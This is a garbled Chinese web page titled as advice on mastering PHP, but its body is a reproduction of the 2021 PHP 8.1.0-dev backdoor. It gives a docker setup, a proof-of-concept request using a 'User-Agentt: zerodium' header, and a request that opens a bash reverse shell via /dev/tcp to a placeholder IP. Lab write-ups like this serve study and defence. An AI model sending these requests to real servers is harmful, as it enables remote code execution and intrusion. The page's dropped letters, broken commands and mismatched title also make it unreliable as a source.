当前位置:首页 > 每日看点 > 正文内容

怎样深入学习php,成为php高手?

卡卷网1年前 (2025-01-01)每日看点223

简介

PHPverion8.1.0-dev于2021年3月28与后门一起发布,但是后门很快被发现并删除。

#漏洞概述

PHPverion8.1.0-dev的PHP在上运行,则攻击者可以通过发送User-Agentt标头执行任意代码。

#影响版本

PHP8.1.0-dev

#环境搭建

新建docker-compose.yml

version:'2' servs: we: image:vulhu/php:8.1-ackdoor volumes: -./index.php:/var/www/html/index.php ports: -"8080:80"

启动环境

docker-composeup-d

#漏洞复现

#poc验证

在header头增加user-agentt字段,值为:zerodiumvar_dump(2*3);

GET//1.1 Host:192.168.81.223:8800 Upgrade-Insece-Requests:1 User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWeKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.77Safari/537.36 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/if,image/wep,image/apng,*/*;q=0.8,application/signed-exchange;v=3;q=0.9 Accept-Encoding:gzip,deflate Accept-Language:zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,en-US;q=0.6 user-agentt:zerodiumvar_dump(2*3); Connection:close

如果执行了这个表达式,说明存在漏洞

#执行命令反弹shell

GET//1.1 Host:192.168.81.223:8800 Praa:no-cache Cache-Control:no-cache Upgrade-Insece-Requests:1 User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWeKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.77Safari/537.36 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/if,image/wep,image/apng,*/*;q=0.8,application/signed-exchange;v=3;q=0.9 Accept-Encoding:gzip,deflate User-Agentt:zerodium("ash-c'execash-i>&/dev/tcp/ip/66660>&1'"); Accept-Language:zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,en-US;q=0.6 Connection:close

#事件分析与反思

代码中含有”zerodium”字符串,而zerodium是一个专门漏洞的.在此事件中,怀疑黑客攻陷了://git.php.net,以PHP作者的名义做了两次代码提交。

#参考文章

s://log.dn.net/zy15667076526/article/details/116447864

扫描二维码推送至手机访问。

版权声明:本文由卡卷网发布,如需转载请注明出处。

本文链接:https://www.kajuan.net/ttnews/2025/01/6068.html

分享给朋友:
返回列表

上一篇:怎么速成C#?

下一篇:浏览器点击网页有中病的风险么,不下载文件执行能保证安全么?

相关文章

小米14和华为mate60怎么选?

手持荣耀20,用了五年多了,使用仍然较为流畅,但是电池不太行了,于是2024年8月在家乡的小米之家购买了小米14(12+256),用了快两个月吧,说说使用体验。 外观层面,由于我使用的荣耀20放在现在妥妥地属于小屏,习惯了小屏...

苹果为什么不做千元机?

苹果为什么不做千元机?

第一步,打开苹果官网,注意是.com,不是.cn;第二步,点击iPhone,选择Compare iPhone;第三步,选择最新iPhone 15系列,查看起售价格,分别为$1199,$999,$799。这不妥妥的千元机吗,怎么苹果就不做千元...

打印速度慢,是不是打印机cpu不行?

打印速度慢,是不是打印机cpu不行?

打印机是机械设备,cpu内存硬盘它也有但这只是它的电控部分,打印机类似于汽车属于机电一体化设备和电脑不是一个类型的产品。很多人总是认为打印机和电脑是一类产品,实际上这是一个误区,电脑是it(Information Technology)信息...

台积电通知其中国客户,从下周开始,所有 7nm 及以下芯片出货将停止。如何看待这一行为?

台积电通知其中国客户,从下周开始,所有 7nm 及以下芯片出货将停止。如何看待这一行为?

我说美国快要没招了,你信么?这次台积电宣布停止向中国大陆客户供应7纳米及更先进AI芯片,再加上前段时间台积电对华为的制裁,我们基本可以认为,台积电在高端芯片领域,已经彻底把大陆给拉黑了,这也意味着中美芯片战已经到了最关键的时刻,一旦我们克服...

闲鱼上为什么会有人问都不问直接下单?

我去年卖一个荣耀90,挂的2200,最终成交2137.5元。对方是一个高高壮壮的西北口音,要求的自取。大概我吃过午饭,约了旁边的商场,那里有荣耀售后。见了面,先看了手机,试了好一会儿,各种测试,没问题。然后去了商场二楼的荣耀售后,让人家售后...

天涯神帖,第一神帖是什么?

天涯神帖,第一神帖是什么?

一些个人觉得比较经典的天涯神贴(更新进去了):话说1999年那会儿,中国的互联网还是个小婴儿,BAT三巨头都还在穿开裆裤呢,天涯社区就已经悄然诞生了。时光飞逝,到了2007年,这小小社区竟然已经吸引了超过2000万的注册用户,不得不说是个小...

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。

Copyright © 2019-2024 www.kajuan.net 版权所有

Powered By Z-BlogPHP. Theme by TOYEAN.